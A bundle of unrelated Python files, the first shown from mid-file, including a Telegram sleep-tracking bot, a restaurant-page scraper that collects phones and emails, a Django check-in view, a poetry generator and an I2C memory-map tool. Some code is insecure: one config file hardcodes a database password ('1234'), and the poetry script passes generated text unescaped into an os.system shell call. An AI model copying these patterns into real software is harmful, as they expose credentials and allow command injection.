text.append(_('Group average: %s, %s→%s') % (
hour_minutes(avginterval, False),
hour_minutes(midnight_adjust(avgstart)),
hour_minutes(midnight_adjust(avgstart + avginterval))))
else:
text.append(_('Not enough data.'))
sendmsg('\n'.join(text), chatid, replyid)
def cmd_subscribe(expr, chatid, replyid, msg):
'''/subscribe - Add you to the watchlist'''
update_user(msg['from'], True)
sendmsg(_("%s, you are subscribed.") % getufname(msg['from']), chatid, replyid)
def cmd_unsubscribe(expr, chatid, replyid, msg):
'''/unsubscribe - Remove you from the watchlist'''
update_user(msg['from'], False)
sendmsg(_("%s, you are unsubscribed.") % getufname(msg['from']), chatid, replyid)
def cmd_settz(expr, chatid, replyid, msg):
'''/settz - Set your timezone'''
if expr and expr in pytz.all_timezones_set:
update_user(msg['from'], timezone=expr)
sendmsg(_("Your timezone is %s now.") % expr, chatid, replyid)
else:
try:
current = USER_CACHE[msg['from']['id']]['timezone']
except KeyError:
current = CFG['defaulttz']
sendmsg(_("Invalid timezone. Your current timezone is %s.") % current, chatid, replyid)
def cmd_time(expr, chatid, replyid, msg):
'''/time - Get time for various timezones'''
tzs = list(filter(lambda x: x in pytz.all_timezones_set, expr.split()))
if not tzs:
if chatid > 0:
tzs = [USER_CACHE[msg['from']['id']]['timezone']]
else:
tzs = [row[0] for row in CONN.execute(
'SELECT users.timezone FROM users'
' INNER JOIN user_chats ON users.id = user_chats.user'
' WHERE user_chats.chat = ? GROUP BY users.timezone'
' ORDER BY count(users.timezone) DESC, users.timezone ASC',
(msg['chat']['id'],))]
if tzs:
text = [_('The time is:')]
for tz in tzs:
usertime = datetime.datetime.now(pytz.timezone(tz))
text.append(' '.join((
'🌞' if tz_is_day(usertime, tz) else '🌜',
usertime.strftime('%H:%M'), tz
)))
sendmsg('\n'.join(text), chatid, replyid)
else:
sendmsg(_("No timezone specified."), chatid, replyid)
def cmd_start(expr, chatid, replyid, msg):
if chatid > 0:
sendmsg(_("This is Trusted Sleep Bot. It can track users' sleep habit by using Telegram online status. Send me /help for help."), chatid, replyid)
def cmd_help(expr, chatid, replyid, msg):
'''/help - Show usage'''
if expr:
if expr in COMMANDS:
h = _(COMMANDS[expr].__doc__)
if h:
sendmsg(h, chatid, replyid)
else:
sendmsg(_('Help is not available for %s') % expr, chatid, replyid)
else:
sendmsg(_('Command not found.'), chatid, replyid)
else:
sendmsg('\n'.join(_(cmd.__doc__) for cmdname, cmd in COMMANDS.items() if cmd.__doc__), chatid, replyid)
def getufname(user, maxlen=100):
name = user['first_name'] or ''
if user.get('last_name'):
name += ' ' + user['last_name']
if len(name) > maxlen:
name = name[:maxlen] + '…'
return name
def load_config():
return AttrDict(json.load(open('config.json', encoding='utf-8')))
def save_config():
json.dump(CFG, open('config.json', 'w'), sort_keys=True, indent=1)
DB.commit()
def handle_update(obj):
if "update_id" in obj:
handle_api_update(obj)
else:
handle_tg_update(obj)
def sig_exit(signum, frame):
save_config()
TGCLI.close()
logging.info('Exited upon signal %s' % signum)
# should document usage in docstrings
COMMANDS = collections.OrderedDict((
('status', cmd_status),
('average', cmd_average),
('settz', cmd_settz),
('time', cmd_time),
('subscribe', cmd_subscribe),
('unsubscribe', cmd_unsubscribe),
('help', cmd_help),
('start', cmd_start)
))
if __name__ == '__main__':
CFG = load_config()
translation = gettext.translation('tsleepd', os.path.join(
os.path.dirname(os.path.abspath(os.path.realpath(sys.argv[0] or 'locale'))),
'locale'), CFG['languages'])
translation.install(('ngettext',))
DB, CONN = None, None
MSG_Q = queue.Queue()
USER_CACHE = {}
TGCLI = tgcli.TelegramCliInterface(CFG.tgclibin)
TGCLI.ready.wait()
TGCLI.on_json = MSG_Q.put
signal.signal(signal.SIGTERM, sig_exit)
try:
USER_CACHE = init_db()
all_status_update()
updatebotinfo()
apithr = threading.Thread(target=getupdates)
apithr.daemon = True
apithr.start()
while 1:
handle_update(MSG_Q.get())
finally:
save_config()
TGCLI.close()
|
import requests # pip install requests
from bs4 import BeautifulSoup # pip install beautifulsoup4
import urllib.request
from urllib.error import HTTPError
from urllib.error import URLError
from datetime import datetime
from socket import timeout
from requests.exceptions import ConnectionError
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import json, errno, os, time, glob, sys, codecs
def loadFileDescargados():
try:
file = open("urls.csv", "r")
for line in file:
lista_URL.append(line.strip())
file.close();
except (FileNotFoundError):
print('');
return
def createFileCSV(filename):
file = open(filename +'.csv',"w")
file.write( 'Name,Description,Phone,Directions,Website,Email,Cuisines,Horarios,Feactures,Meals,GoodFor,Url\n')
for valor in listaCSV:
yourstring = valor.encode('ascii', 'ignore').decode('ascii')
file.write(yourstring + '\n');
file.close();
return
#
#
# ********************************** Programa principal **********************************
#
#
lista_URL =[];
listaCSV =[];
loadFileDescargados()
iterar = 0;
archi = 0;
browser = webdriver.Firefox()
for url in lista_URL:
iterar=iterar+1;
response = urllib.request.urlopen(url, timeout=120)
html = response.read()
html = BeautifulSoup(html, 'html.parser');
nombre = html.find_all(class_='heading_title')[0].text.strip();
try:
tel = html.find_all(class_='blEntry phone')[0].text.strip();
except:
tel = ''
try:
dire = html.find_all(class_='address')[0].text.strip();
except (FileNotFoundError):
dire = ''
try:
cuisines = html.find_all(class_='ui_column is-6 cuisines')[0].find_all(class_='text')[0].text.strip();
except:
cuisines = ''
horaComp = ''
try:
horas = html.find_all(class_='hours content')[0].find_all(class_='detail');
for textt in horas:
horadia = '----';
for thor in textt.find_all(class_='hoursRange'):
horadia = horadia + ' / ' + thor.text
horadia = textt.find_all(class_='day')[0].text + ' ' + horadia;
horaComp = horaComp + horadia.replace("---- /","") + '\n';
except:
horaComp = ''
filas = html.find_all(class_='details_tab')[0].find_all(class_='row');
features = ''
try:
for textt in filas:
if "Restaurant features" in (str(textt)):
features = textt.find_all(class_='content')[0].text.strip()
except:
features = ''
meals = ''
try:
for textt in filas:
if "Meals" in (str(textt)):
meals = textt.find_all(class_='content')[0].text.strip()
except:
meals = ''
descri = ''
try:
descripp = html.find_all(class_='additional_info');
for textt in descripp:
if "Description " in (str(textt)):
descri = textt.find_all(class_='content')[0].text.strip()
except:
descri = ''
goodFor = '';
try:
for textt in filas:
if "Good for" in (str(textt)):
goodFor = textt.find_all(class_='content')[0].text.strip()
except:
goodFor = '';
email = '';
try:
email2 = html.find_all(class_='detailsContent')[0].find_all('li');
for textt in email2:
if "E-mail" in (str(textt)):
email = textt.find_all('a')[0]['href'].strip().replace("mailto:","")
except :
email = '';
website = '';
try:
pino = '1';
for aa in browser.window_handles:
if (pino == '1'):
pino='true'
else:
browser.switch_to_window(aa)
browser.close()
browser.switch_to_window(browser.window_handles[0])
browser.get(url)
browser.find_element_by_css_selector('div.blEntry:nth-child(3)').click();
browser.switch_to_window(browser.window_handles[1])
website = browser.current_url
while( "about:blank" in website):
time.sleep(5)
website = browser.current_url
browser.close()
except :
website = '';
print (nombre + ' ' + website)
listaCSV.append( '"' + nombre.replace("\"","") +'","'+ descri.replace("\"","") +'","'+ tel.replace("\"","") +'","'+ dire.replace("\"","") +'","'+ website.replace("\"","") +'","'+ email.replace("\"","") +'","'+ cuisines.replace("\"","") +'","'+ horaComp.replace("\"","") +'","'+ features.replace("\"","") +'","'+ meals.replace("\"","") +'","'+ goodFor.replace("\"","") +'","'+ url.replace("\"","") + '"')
if (iterar==50):
archi = archi + 1;
iterar = 0;
createFileCSV('file' + str(archi));
createFileCSV('file' + str(archi));
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.shortcuts import render,redirect
from django.views.generic.list import ListView
from form import RegistroForms, ChequeoForms
from models import Becarios, Registro
import datetime
# Create your views here.
def base(request):
return render(request,'apps/Base.html')
def Registro_view(request):
if request.method == 'POST':
form = RegistroForms(request.POST)
if form.is_valid():
form.save()
return redirect('Registrar_view')
else:
form = RegistroForms()
return render(request,'apps/Registro.html',{'form':form})
def Chequeo_view(request):
form = ChequeoForms(request.POST or None)
mensaje=""
verificar = False
verificar2 = False
alumno = Becarios.objects.all()
fecha = Registro.objects.all()
f = Registro(FecReg=datetime.datetime.now())
print (form.is_valid())
if form.is_valid():
print (request.user.is_superuser)
if request.user.is_superuser:
nocontrol1 = form.cleaned_data["nocontrol"]
for alumn in alumno:
print (nocontrol1 == alumn.Nocontrol)
if nocontrol1 == alumn.Nocontrol:
verificar=True
p = Registro(nocontrol=alumn,FecReg=datetime.datetime.now())
for fec in fecha:
if nocontrol1 != fec.FechaReg:
p.save()
if nocontrol1 == fec.FechaReg:
mensaje="Ya checaste el dia de hoy"
mensaje="Comida Registrada"
if verificar == False:
mensaje="Alumno no registrado en el sistema"
form=ChequeoForms()
return render(request,'apps/Chequeo.html',{"form":form,"Mensaje":mensaje})
#def Mostrar_view(request):
class Becarios_report(ListView):
template_name = "apps/Becarios_report.html"
model = Becarios
'''
class Becarios_report(ListView):
template_name = "apps/becarios_report.html"
model= Becarios'''
|
"""
Jiun Kim
M6 Poetry Slam
This is Poetry Maker Punchline King made by Jiun Kim.
The libraries used are pyrhyme which makes rhyme words and word files from the internet.
"""
from random import randint, randrange
import pyrhyme
class RandomWordGenerator:
"""
This class makes random noun, verb, adjective, adverb and subject.
It also creates rhyme given a word.
"""
def __init__(self):
self.nouns = {}
self.verbs = {}
self.adjectives = {}
self.adverbs = {}
self.subjects = ["I", "He", "She", "They", "We", "You"]
self.rhymer = pyrhyme.RhymeBrain()
for i in range(1, 5):
# Loops through the files to store all the words from the
# prepared word files.
f = open(f"adjectives/{i}syllableadjectives.txt", "r")
self.adjectives[i] = f.read().split()
f.close()
f = open(f"adverbs/{i}syllableadverbs.txt", "r")
self.adverbs[i] = f.read().split()
f.close()
f = open(f"nouns/{i}syllablenouns.txt", "r")
self.nouns[i] = f.read().split()
f.close()
f = open(f"verbs/{i}syllableverbs.txt", "r")
self.verbs[i] = f.read().split()
f.close()
def make_rhyme(self, word):
"""
Uses rhyming library to pick the first(best) rhyme for a given word.
"""
rhymes = [x.word for x in self.rhymer.rhyming(word, lang='en')]
if len(rhymes) == 0:
# Edge Case: There might be no rhymes. Then just return the original word.
return word
else:
return rhymes[0]
def generate_word(self, word):
"""
Generate random word given the type of the word.
"""
if word == "Noun":
return self.random_noun()
elif word == "Adjective":
return self.random_adjective()
elif word == "Adverb":
return self.random_adverb()
elif word == "Verb":
return self.random_verb()
elif word == "Subject":
result = self.random_subject()
return result
"""
Random word generating functions.
"""
def random_subject(self):
return self.subjects[randint(0, 5)]
def random_verb(self):
syllable = randint(1,4)
return self.verbs[syllable][randrange(0, len(self.verbs[syllable])-1)]
def random_adjective(self):
syllable = randint(1,4)
return self.adjectives[syllable][randrange(0, len(self.adjectives[syllable])-1)]
def random_adverb(self):
syllable = randint(1,4)
return self.adverbs[syllable][randrange(0, len(self.adverbs[syllable])-1)]
def random_noun(self):
syllable = randint(1,4)
return self.nouns[syllable][randrange(0, len(self.nouns[syllable])-1)]
class RandomSentenceGenerator:
"""
Uses random word generator in order to create random sentences.
"""
def __init__(self):
self.word_generator = RandomWordGenerator()
#Basic sentence structures to provide structure to the poem.
self.sentence_structures = {
0: ["Subject", "Verb"],
1: ["Subject", "Verb", "Noun"],
2: ["Subject", "Verb", "Adjective"],
3: ["Subject", "Verb", "Adverb"],
4: ["Noun", "Verb", "Noun"],
}
def generate_sentence(self):
"""
Create a pair of sentences. Second sentence has a word that
rhymes with the word in the first sentence.
"""
sentence_structure = self.sentence_structures[randint(0, 4)]
first_line = ""
second_line = ""
rhyme_index = randint(0, len(sentence_structure)-1) # arbitrarily pick an index that will rhyme.
for index, word in enumerate(sentence_structure):
new_word = self.word_generator.generate_word(word)
new_word2 = self.word_generator.generate_word(word)
if index == rhyme_index:
new_word2 = self.word_generator.make_rhyme(new_word)
first_line += new_word + " "
second_line += new_word2 + " "
return first_line + "\n" + second_line
class Evaluator:
"""
Evalate a poem.
"""
def __init__(self):
self.alphabets = []
def evaluate(self, poem):
"""
Check the diversity of the words used in the poem.
The first letter of the words in the poem should be diverse and
the number of different first letter used will be the score of the
poem.
"""
words = poem.split()
result = 0
for word in words:
self.alphabets.append(word[0])
result += len(list(set(self.alphabets)))
return result
sentence_generator = RandomSentenceGenerator()
evaluator = Evaluator()
poem = ""
for i in range(1, 5):
sentence = sentence_generator.generate_sentence()
poem += sentence + "\n\n"
result = str(evaluator.evaluate(poem))
title = sentence_generator.word_generator.generate_word("Noun")
print(f"\nTitle: {title} \n\n")
print(poem)
print("The score is ", result)
import os
os.system(f"say -v Alex '{poem}'")
os.system(f"say -v Alex 'The score is {result}'") |
import matplotlib.pyplot as plt
# input_values=[1,2,3,4,5]
# squares=[1,4,9,16,25]
# plt.plot(input_values,squares,linewidth=3)
# plt.title("Square Numbers",fontsize=18)
# plt.xlabel("Value",fontsize=15)
# plt.ylabel("Square of Value",fontsize=15)
# plt.tick_params(axis='both',labelsize=15)
#
# # plt.show()
#
# x_values=list(range(1,100))
# y_values=[x**2 for x in x_values]
# plt.scatter(x_values,y_values,c='green',edgecolors=None,s=40)
# plt.title("Square numbers",fontsize=22)
# plt.xlabel("value",fontsize=12)
# plt.ylabel("square value",fontsize=11)
#
# plt.tick_params(axis='both',which='major',labelsize=5)
# plt.savefig('squart_plot.png',bbox_inches='tight')
# plt.axis([0,100,0,10000])
# plt.show()
from random import choice
class RandomWalk():
"""一个生成随机漫步数据的类"""
def __init__(self,num_points=5000):
self.num_points=num_points
self.x_values=[0]
self.y_values=[0]
def fill_walk(self):
while (len(self.x_values)<self.num_points):
x_step=self.get_step()
y_step=self.get_step()
if x_step ==0 and y_step==0:
continue
next_x=self.x_values[-1]+x_step
next_y=self.y_values[-1]+y_step
self.x_values.append(next_x)
self.y_values.append(next_y)
def get_step(self):
z_direction = choice([1, -1])
z_distance = choice([0, 1, 2, 3, 4])
walk = z_direction * z_distance
return walk
|
import numpy as np
import csv
def transformToRNN(filename = 'tweeti.b.dist.parsed'):
outfile = 'trees/temp.txt'
if filename == 'data/b.train.preprocessed.utf8.parsed':
outfile = 'trees/train.txt'
elif filename == 'data/b.dev.preprocessed.utf8.parsed':
outfile = 'trees/dev.txt'
elif filename == 'data/b.test.parsed':
outfile = 'trees/test.txt'
labelMap = {"neutral":1,"positive":2,"negative":0,"objective":1,"objective-OR-neutral":1,
"neutral\"\"":1,"positive\"\"":2,"negative\"\"":0,"objective\"\"":1,"objective-OR-neutral\"\"":1}
reader = csv.reader(open(filename),delimiter="\t")
writer = open(outfile,'w')
for line in reader:
treeString = line[3][6:-1]
index = treeString.index(' ')
writer.write("("+str(labelMap[line[2]])+treeString[index:]+'\n')
writer.close()
def seperateTrainDev():
total = 6092
percent = 0.2
devIndices = set(np.random.choice(total,size = percent*total,replace=False))
indicesWriter = open('data/dev_indices','w')
indicesWriter.write(str(devIndices))
indicesWriter.close()
filename = 'data/tweeti.b.dist'
reader = open(filename)
trainWriter = open('data/b.train','w')
devWriter = open('data/b.dev','w')
for i,line in enumerate(reader):
if i in devIndices:
devWriter.write(line)
else:
trainWriter.write(line)
devWriter.close()
trainWriter.close()
transformToRNN(filename = 'data/b.dev.preprocessed.utf8.parsed')
transformToRNN(filename = 'data/b.train.preprocessed.utf8.parsed')
|
user = "postgres"
host = "172.22.240.1"
port = "5432"
db_model_name = "demo"
db_model_pswd = "1234" |
"""Segment pollen tubes."""
import os
import argparse
import warnings
import math
import logging
import numpy as np
import scipy.ndimage
from skimage.morphology import disk
import skimage.feature
from jicbioimage.core.image import Image
from jicbioimage.core.transform import transformation
from jicbioimage.core.util.color import pretty_color
from jicbioimage.core.io import AutoWrite, AutoName
from jicbioimage.transform import (
mean_intensity_projection,
# threshold_otsu,
dilate_binary,
erode_binary,
remove_small_objects,
invert,
)
from jicbioimage.segment import connected_components, watershed_with_seeds
from jicbioimage.illustrate import AnnotatedImage
__version__ = "0.5.0"
# Suppress spurious scikit-image warnings.
# warnings.filterwarnings("ignore", module="skimage.exposure._adapthist")
# warnings.filterwarnings("ignore", module="skimage.util.dtype")
warnings.filterwarnings("ignore", module="skimage.io._io")
# Setup logging with a stream handler.
logger = logging.getLogger(os.path.basename(__file__))
logger.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
logger.addHandler(ch)
AutoName.prefix_format = "{:03d}_"
def form_factor(prop):
"""Return form factor circularity measure."""
return (4 * math.pi * prop.area) / float(prop.perimeter)**2
def centroid(region):
"""Return y, x centroid coordinates."""
return tuple([int(np.mean(ia)) for ia in region.index_arrays])
@transformation
def threshold_median(image, scale=0):
return image > np.median(image) * scale
@transformation
def remove_large_segments(segmentation, max_size):
"""Remove large regions from a segmentation."""
for i in segmentation.identifiers:
region = segmentation.region_by_identifier(i)
if region.area > max_size:
segmentation[region] = 0
return segmentation
@transformation
def remove_small_segments(segmentation, min_size):
"""Remove small regions from a segmentation."""
for i in segmentation.identifiers:
region = segmentation.region_by_identifier(i)
if region.area < min_size:
segmentation[region] = 0
return segmentation
@transformation
def fill_holes(image, min_size):
"""Return image with holes filled in."""
tmp_autowrite_on = AutoWrite.on
AutoWrite.on = False
image = invert(image)
image = remove_small_objects(image, min_size=min_size)
image = invert(image)
AutoWrite.on = tmp_autowrite_on
return image
@transformation
def distance(image):
"""Return result of an exact euclidean distance transform."""
return scipy.ndimage.distance_transform_edt(image)
@transformation
def local_maxima(image, footprint=None, labels=None):
"""Return local maxima."""
return skimage.feature.peak_local_max(image,
indices=False,
footprint=footprint,
labels=labels)
def fpath2name(fpath):
"""Return 'test' from path /tmp/test.txt"""
bname = os.path.basename(fpath)
name, suffix = bname.split(".")
return name
def find_grains(input_file, output_dir=None):
"""Return tuple of segmentaitons (grains, difficult_regions)."""
name = fpath2name(input_file)
name = "grains-" + name + ".png"
if output_dir:
name = os.path.join(output_dir, name)
image = Image.from_file(input_file)
intensity = mean_intensity_projection(image)
# Median filter seems more robust than Otsu.
# image = threshold_otsu(intensity)
image = threshold_median(intensity, scale=0.8)
image = invert(image)
image = erode_binary(image, selem=disk(2))
image = dilate_binary(image, selem=disk(2))
image = remove_small_objects(image, min_size=200)
image = fill_holes(image, min_size=50)
dist = distance(image)
seeds = local_maxima(dist)
seeds = dilate_binary(seeds) # Merge spurious double peaks.
seeds = connected_components(seeds, background=0)
segmentation = watershed_with_seeds(dist, seeds=seeds, mask=image)
# Remove spurious blobs.
segmentation = remove_large_segments(segmentation, max_size=3000)
segmentation = remove_small_segments(segmentation, min_size=100)
return segmentation
def annotate(input_file, output_dir):
"""Write an annotated image to disk."""
logger.info("---")
logger.info('Input image: "{}"'.format(os.path.abspath(input_file)))
image = Image.from_file(input_file)
intensity = mean_intensity_projection(image)
name = fpath2name(input_file)
png_name = name + ".png"
csv_name = name + ".csv"
png_path = os.path.join(output_dir, png_name)
csv_path = os.path.join(output_dir, csv_name)
grains = find_grains(input_file, output_dir)
ann = AnnotatedImage.from_grayscale(intensity)
# Determine the median grain size based on the segmented regions.
areas = []
for i in grains.identifiers:
region = grains.region_by_identifier(i)
areas.append(region.area)
median_grain_size = np.median(areas)
num_grains = 0
for i in grains.identifiers:
region = grains.region_by_identifier(i)
color = pretty_color(i)
num_grains_in_area = region.area / median_grain_size
num_grains_in_area = int(round(num_grains_in_area))
if num_grains_in_area == 0:
continue
outer_line = region.dilate().border
outline = region.border.dilate() * np.logical_not(outer_line)
ann.mask_region(outline, color=color)
ann.text_at(str(num_grains_in_area), region.centroid,
color=(255, 255, 255))
num_grains = num_grains + num_grains_in_area
ann.text_at("Num grains: {:3d}".format(num_grains), (10, 10),
antialias=True, color=(0, 255, 0), size=48)
logger.info("Num grains: {:3d}".format(num_grains))
logger.info('Output image: "{}"'.format(os.path.abspath(png_path)))
with open(png_path, "wb") as fh:
fh.write(ann.png())
logger.info('Output csv: "{}"'.format(os.path.abspath(csv_path)))
with open(csv_path, "w") as fh:
fh.write("{},{}\n".format(png_name, num_grains))
return png_name, num_grains
def analyse_all(input_dir, output_dir):
summary_name = "summary.csv"
summary_name = os.path.join(output_dir, summary_name)
logger.info('Summary csv: "{}"'.format(os.path.abspath(summary_name)))
with open(summary_name, "w") as fh:
fh.write("img,grains\n")
for fname in os.listdir(input_dir):
if not fname.lower().endswith("jpg"):
continue
if fname.lower().startswith("leicalogo"):
continue
fpath = os.path.join(input_dir, fname)
png_name, num_grains = annotate(fpath, output_dir)
fh.write("{},{}\n".format(png_name, num_grains))
def main():
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument("input", help="Input file/directory")
parser.add_argument("output_dir", help="Output directory")
parser.add_argument("--debug", default=False, action="store_true",
help="Write out intermediate images")
args = parser.parse_args()
if not os.path.isdir(args.output_dir):
os.mkdir(args.output_dir)
AutoName.directory = args.output_dir
# Create file handle logger.
log_filename = "log"
if os.path.isfile(args.input):
log_filename = fpath2name(args.input) + ".log"
fh = logging.FileHandler(os.path.join(args.output_dir, log_filename),
mode="w")
fh.setLevel(logging.DEBUG)
format_ = "%(asctime)s - %(name)s - %(levelname)s - %(message)s"
formatter = logging.Formatter(format_)
fh.setFormatter(formatter)
logger.addHandler(fh)
logger.info("Script name: {}".format(__file__))
logger.info("Script version: {}".format(__version__))
# Only write out intermediate images in debug mode.
if not args.debug:
AutoWrite.on = False
if os.path.isfile(args.input):
annotate(args.input, args.output_dir)
elif os.path.isdir(args.input):
analyse_all(args.input, args.output_dir)
else:
parser.error("{} not a file or directory".format(args.input))
if __name__ == "__main__":
main()
|
'''
*******************************************************************************
Desc : A script used to parse/access Internal MemoryMap.
Note : N/A
History : 2010/07/15 Panda.Xiong Create
*******************************************************************************
'''
from ctypes import *
import sys
import string
import os
import xlrd
import i2c
class _AddrInfo:
'used to store parsed address information'
def __init__(self, mem_addr=0, mem_page_id=0, mem_offset=0, mem_len=0, mem_bit=0):
self.mem_addr = mem_addr
self.mem_page_id = mem_page_id # -1 means DIRECT Page
self.mem_offset = mem_offset
self.mem_len = mem_len # if mem_bit == -1, this means Byte(s) length; else, means bit length.
self.mem_bit = mem_bit # -1 means Byte(s)
class MemoryMap:
def _assert(self, message):
print 'Error: ' + message
sys.exit(-1)
def __init__(self, filename=None, debug_enable=False):
# check input filename
if filename == None:
self._assert('Incorrect filename!')
self.filename = filename
self.debug_enable = debug_enable
# create an empty dictionary
self.memtable = {}
if self.debug_enable:
self.logname = r"~test.log"
self.log = file(self.logname, 'w')
# load I2C Library
self.i2c = i2c.I2C()
# open Internal MemoryMap
self._open()
def _parse_address(self, s_addr):
'parse address string'
valid_addr_string_table = ['0','1','2','3','4','5','6','7','8','9',
'A','B','C','D','E','F',
'[',']','.','-']
# check the input address string is valid or not
for i in range(len(s_addr)):
if not s_addr[i] in valid_addr_string_table:
self._assert('Invalid Address(1): %s' % s_addr)
addr_info = _AddrInfo()
# split input address string
ss_parse = s_addr.split('.')
# get memory address & page id
if (len(ss_parse) != 2) and (len(ss_parse) != 3):
self._assert('Invalid Address(2): %s' % s_addr)
if ss_parse[0].find('[') == -1:
# DIRECT Page
addr_info.mem_addr = string.atoi(ss_parse[0], 16)
addr_info.mem_page_id = -1
else:
# Extended Page
dev_end_index = ss_parse[0].index('[')
page_end_index = ss_parse[0].index(']')
addr_info.mem_addr = string.atoi(ss_parse[0][0:dev_end_index], 16)
addr_info.mem_page_id = string.atoi(ss_parse[0][dev_end_index+1:page_end_index], 16)
# get memory offset & length
if ss_parse[1].find('-') == -1:
# memory length is 1 Byte
addr_info.mem_offset = string.atoi(ss_parse[1], 16)
addr_info.mem_len = 1
else:
# memory length is over 1 Byte
if len(ss_parse) == 3:
self._assert('Invalid Address(3): %s' % s_addr)
ss_offset = ss_parse[1].split('-')
addr_info.mem_offset = string.atoi(ss_offset[0], 16)
addr_info.mem_len = string.atoi(ss_offset[1], 16) - addr_info.mem_offset + 1
# get memory bit
if len(ss_parse) == 2:
# memory is Byte(s)
addr_info.mem_bit = -1
else:
# memory is bit
ss_bit = ss_parse[2].split('-')
addr_info.mem_bit = string.atoi(ss_bit[0], 16)
if len(ss_bit) == 1:
addr_info.mem_len = 1
else:
addr_info.mem_len = string.atoi(ss_bit[1], 16) - addr_info.mem_bit
if addr_info.mem_len > 8:
self._assert('Invalid Address(4): %s' % s_addr)
return addr_info
def _record(self, row_key, row_data):
'record Memory Map'
# check this memory is recorded or not
if row_key in self.memtable:
self._assert('Duplicate Memory definition: "%s"' % row_key)
# parse address & record this memory
mem_info = []
addr_info = self._parse_address(row_data[0].upper())
mem_info.append(addr_info)
mem_info.append(row_data[2]) # memory description
self.memtable[row_key] = mem_info
if self.debug_enable:
# debug record log
s_addr = 'addr:%02X, page_id:%02X, offset:%02X, len:%02X, bit:%-2X' % \
(addr_info.mem_addr,
addr_info.mem_page_id,
addr_info.mem_offset,
addr_info.mem_len,
addr_info.mem_bit)
self.log.write('%-35s : %-50s %s\n' % (row_key, s_addr, row_data[2]))
def _open(self):
# open excel file
try:
self.xlBook = xlrd.open_workbook(self.filename)
self.sheet = self.xlBook.sheet_by_name('Internal Memory Map')
except:
self._assert('Open Excel File "%s" Fail!' % self.filename)
# launch all memory definitions
for row in range(1, self.sheet.nrows):
# read memory data
mem_data = self.sheet.row_values(row)
mem_name = mem_data[0].strip()
# have reached to the end of excel file, exit
if mem_name == 'END':
break
# if this memory is not empty, record it
if mem_name:
self._record(mem_name, mem_data[1:])
def CONFIG_SET(self, mem_name, mem_value):
if not mem_name in self.memtable:
self._assert('Memory "%s" is not found in MemoryMap!' % mem_name)
addr_info = self.memtable[mem_name][0]
# create write buffer
write_buf = []
if type(mem_value) == type('abcd'): # string type
if addr_info.mem_bit != -1:
# bit memory
self._assert('Do not know how to write string to bit Memory "%s"!' % mem_name)
if len(mem_value) != addr_info.mem_len:
self._assert('The length of Memory "%s" doesnot match input string "%s"!' % (mem_name, mem_value))
for i in range(addr_info.mem_len):
write_buf.append(ord(mem_value[i]))
elif type(mem_value) == type(0x12345678): # integer type
if addr_info.mem_bit != -1:
# bit memory
if mem_value >= 0xFF:
self._assert('A bit Memory "%s" can only be within 1 byte!' % mem_name)
if (mem_value & (0xFF << addr_info.mem_len)) != 0:
self._assert('Input Memory Data too long for bit Memory "%s"! %X' % mem_name)
else:
# Byte(s) memory
if (mem_value >> addr_info.mem_len*8) != 0:
self._assert('Input Memory "%s" data "0x%X" length too long!' % (mem_name, mem_value))
for i in range(addr_info.mem_len):
tmp_value = (mem_value>>((addr_info.mem_len-i-1)*8)) & 0xFF
write_buf.append(tmp_value)
# select page
if addr_info.mem_page_id != -1:
(vResult, aBuf) = self.i2c.RandomRead(addr_info.mem_addr, 0x7F, 1)
if vResult:
if aBuf[0] != addr_info.mem_page_id:
aBuf[0] = addr_info.mem_page_id
if not self.i2c.RandomWrite(addr_info.mem_addr, 0x7F, aBuf):
self._assert('Change Page ID to 0x%02X Fail!' % addr_info.mem_page_id)
else:
self._assert('Read Current Selected Page ID Fail!')
# write memory
if addr_info.mem_bit == -1:
# Byte(s) Memory
if not self.i2c.RandomWrite(addr_info.mem_addr, addr_info.mem_offset, write_buf):
self._assert('Write Memory "%s" Fail!' % mem_name)
else:
# bit memory
# read byte memory, which contains this bit memory
(vResult, aBuf) = self.i2c.RandomRead(addr_info.mem_addr, addr_info.mem_offset, 1)
if not vResult:
self._assert('Read bit Memory "%s" Fail!' % mem_name)
# modify memory
vMask = (~(0xFF << addr_info.mem_len) & 0xFF) << addr_info.mem_bit # mask for bit memory
aBuf[0] &= ~vMask
aBuf[0] |= ((write_buf[0] << addr_info.mem_bit) & vMask)
# write the modified memory
if not self.i2c.RandomWrite(addr_info.mem_addr, addr_info.mem_offset, aBuf):
self._assert('Write bit Memory "%s" Fail!' % mem_name)
def CONFIG_GET(self, mem_name):
if not mem_name in self.memtable:
self._assert('Memory "%s" is not found in MemoryMap!' % mem_name)
addr_info = self.memtable[mem_name][0]
# select page
if addr_info.mem_page_id != -1:
(vResult, aBuf) = self.i2c.RandomRead(addr_info.mem_addr, 0x7F, 1)
if vResult:
if aBuf[0] != addr_info.mem_page_id:
aBuf[0] = addr_info.mem_page_id
if not self.i2c.RandomWrite(addr_info.mem_addr, 0x7F, aBuf):
self._assert('Change Page ID to 0x%02X Fail!' % addr_info.mem_page_id)
else:
self._assert('Read Current Selected Page ID Fail!')
# read memory
if addr_info.mem_bit == -1:
# Byte(s) Memory
(vResult, aReadBuf) = self.i2c.RandomRead(addr_info.mem_addr, addr_info.mem_offset, addr_info.mem_len)
if vResult:
if addr_info.mem_len == 1:
return aReadBuf[0]
else:
return aReadBuf
else:
self._assert('Read Memory "%s" Fail!' % mem_name)
else:
# bit memory
# read byte memory, which contains this bit memory
(vResult, aBuf) = self.i2c.RandomRead(addr_info.mem_addr, addr_info.mem_offset, 1)
if not vResult:
self._assert('Read bit Memory "%s" Fail!' % mem_name)
# get & return bit memory value
vMask = (~(0xFF << addr_info.mem_len) & 0xFF) << addr_info.mem_bit # mask for bit memory
aBuf[0] &= vMask
return (aBuf[0] >> addr_info.mem_bit)
'auto-test scripts'
if __name__ == '__main__':
print ' ---- Start Testing ---- '
map = MemoryMap(r'../1620-00100-00_InternalMemoryMap.xls', True)
print ' ---- Load MemoryMap Done ---- '
map.CONFIG_SET('PWD_Entry', 0x7E755D4F)
print ' -> Get "PWD_Entry" memory:',
aReadBuf = map.CONFIG_GET('PWD_Entry')
for i in range(len(aReadBuf)):
print '%02X' % aReadBuf[i],
print
map.CONFIG_SET('RT_SW_TXDIS', 1)
print ' -> Get "RT_SW_TXDIS" bit memory: %X' % map.CONFIG_GET('RT_SW_TXDIS')
map.CONFIG_SET('Debug_System_Ctrl_Polling_Dis', 1)
print ' -> Get "Debug_System_Ctrl_Polling_Dis" bit memory: %X' % map.CONFIG_GET('Debug_System_Ctrl_Polling_Dis')
map.CONFIG_SET('Page_Select', 0x81)
